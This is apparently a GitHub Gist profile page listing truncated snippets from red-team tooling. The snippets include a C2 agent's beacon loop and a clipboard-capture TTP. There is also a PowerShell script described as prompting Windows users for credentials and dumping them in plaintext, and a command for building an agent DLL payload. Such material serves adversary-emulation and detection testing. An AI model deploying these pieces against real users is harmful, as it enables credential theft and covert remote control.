Skip to content

Instantly share code, notes, and snippets.

Avatar
👾
Working from the Immaterium

Alex khyberspache

👾
Working from the Immaterium
View GitHub Profile
@khyberspache
khyberspache / iam_policy.json
Created Oct 25, 2021
Simple Prelude EC2 IAM Policy
View iam_policy.json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"ec2:AuthorizeSecurityGroupIngress",
"ec2:DescribeAddresses",
"ec2:DescribeImages",
"ec2:DescribeInstances",
@khyberspache
khyberspache / hush_handle_api_task.js
Created Sep 3, 2021
Example of hush handling an API task
View hush_handle_api_task.js
if (task[0] === 'api') {
if (task[2]) {
try {
task[2] = JSON.parse(task[2]);
} catch (e) {
throw new Error("Could not parse module params: "+e.toString());
}
}
return runModule(task[0], task[1], task[2] || null);
}
@khyberspache
khyberspache / hush_run.js
Created Sep 3, 2021
Hush agent's main event loop
View hush_run.js
function run(argv) {
beacon = new Beacon((argv.length > 0) ? (argv[0] || argv) : 'http://localhost:3391', (argv.length > 1) ? argv[1] : 'http');
while (true) {
try {
let tasks = runModule('c2', beacon.contact, {beacon: beacon});
beacon.Links = tasks.map(task => executeTask(Object.assign(new Instruction(), task, {Pid: beacon.pid})));
} catch (e) {
console.log(`Beacon failed. ${e}`)
}
console.log(`Sleeping for ${beacon.Sleep} seconds`);
@khyberspache
khyberspache / commands_windows_example.go
Created Sep 3, 2021
Example CallNativeAPI implementation
View commands_windows_example.go
package commands
import (
"encoding/json"
"log"
"os"
"syscall"
"unsafe"
)
View api_keyword.yml
platforms:
windows:
keyword:
command: api.ps
@khyberspache
khyberspache / clipboard_module.yml
Last active Sep 3, 2021
Example PneumaEX module TTP
View clipboard_module.yml
id: 2897b095-3356-456f-876c-3103f91352ab
metadata:
version: 1
authors:
- khyberspache
tags:
- thinktank
name: Capture clipboard using a module
description: |
Installs a user-land clipboard capture binary and collects the clipboard every 30 seconds for 10 minutes.
@khyberspache
khyberspache / clipboard_module_ideal.yml
Created Sep 3, 2021
Example of what a good Keyword TTP would look like
View clipboard_module_ideal.yml
platforms:
darwin:
keyword:
command: collect.captureClipboard
@khyberspache
khyberspache / Invoke-PromptForCredentials.ps1
Last active Jan 19, 2021
Prompt a user for credentials on Windows and dump in plaintext
View Invoke-PromptForCredentials.ps1
$type=@"
using System;
using System.Text;
using System.Runtime.InteropServices;
public static class CredUI
{
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)]
private struct CREDUI_INFO
@khyberspache
khyberspache / build.sh
Created Jan 19, 2021
CGO build command for Windows DLL with 64-bit address ASLR and NX compatibility on
View build.sh
GOOS=windows CC=x86_64-w64-mingw32-gcc CGO_ENABLED=1 go build --buildmode=c-shared --ldflags='-s -w -X main.key="MYKEYISBESTKEY" -extldflags "-Wl,--nxcompat -Wl,--dynamicbase -Wl,--high-entropy-va"' -o payloads/pneuma.dll main.go;
@khyberspache
khyberspache / main.go
Created Jan 19, 2021
Example main.go for pneuma to compile into a shared library with an exported function on Windows
View main.go
//+build cgo
package main
import "C"
import (
"flag"
"github.com/preludeorg/pneuma/sockets"
"github.com/preludeorg/pneuma/util"
"log"